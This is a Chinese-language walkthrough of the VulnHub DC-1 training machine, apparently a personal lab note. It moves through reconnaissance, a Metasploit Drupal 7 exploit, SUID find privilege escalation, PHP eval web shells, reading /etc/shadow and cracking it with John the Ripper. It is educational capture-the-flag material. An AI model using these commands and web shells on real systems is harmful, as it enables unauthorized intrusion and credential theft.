渗透测试全流程靶机vulnhubDC-1完成笔记

镜像下载地址

https://www.vulnhub.com/entry/dc-1-1,292/

信息收集

1、可以使用netdiscover -i eth0 发现二层网络信息

发现两个设备（103是真实机）。其中105为目标机器。
2、端口发现
Nmap -A 192.168.1.105

发现三个端口 22 80 111
80为http则直接浏览器访问
3、web指纹发现

发现Drupal 版本为 7

准备web渗透

因为7版本存在漏洞 而且在msf中也有
Drupal漏洞
在网上找了一圈没找到可getshell的exp，因为msf里面有集成cms的利用模块，所以使用msf进行getshell，用search命令搜索，发现7个漏洞模块，这里我随便选择了一个（use 2）

Show option 只需要填写RHOSTS

Set RHOSTS 192.168.1.105
Run

获取shell与与提权

因为仅仅是一个session 所以无法whoami 直接使用getuid

提权方法--查找具有root权限的命令进行提权

发现是 www-data用户。那么就需要提权
首先需要有session切换成shell
然后查找具有suid的文件，让这些文件来执行命令进行提权
Find / -perm -u=s -ype f 2>dev.null

发现find命令具有root权限，那就touch一个1 用find提权

使用find 1 -exec ‘/bin/sh’ \; 进入高权限shell

然后再写个一句话木马方便链接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php \;
这里使用单引号包含需要写入的内容。放置$_GET被转义
重新写下find 1 -exec echo '<?php eval($_POST[a]);'>123.php \;

内网信息获取

1、百度查找该CMS配置，可以找到配置文件路径。发现如下信息

2、这个不用看，数据库肯定不能远程链接， 直接蚁剑链接数据库
登陆即可产看到flag3

3、密码获取
cat /etc/shadow

使用join爆破一下

find /etc/shadow -exec cat {} ;>all,txt 导入到当前txt中，用蚁剑下载下来

john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list为默认密码

登陆之后更目录下获取flag4

根据提示使用find flag4.txt -exec ‘/bin/sh’ ;切换到root权限

根据提示进入/root

发现最后的flag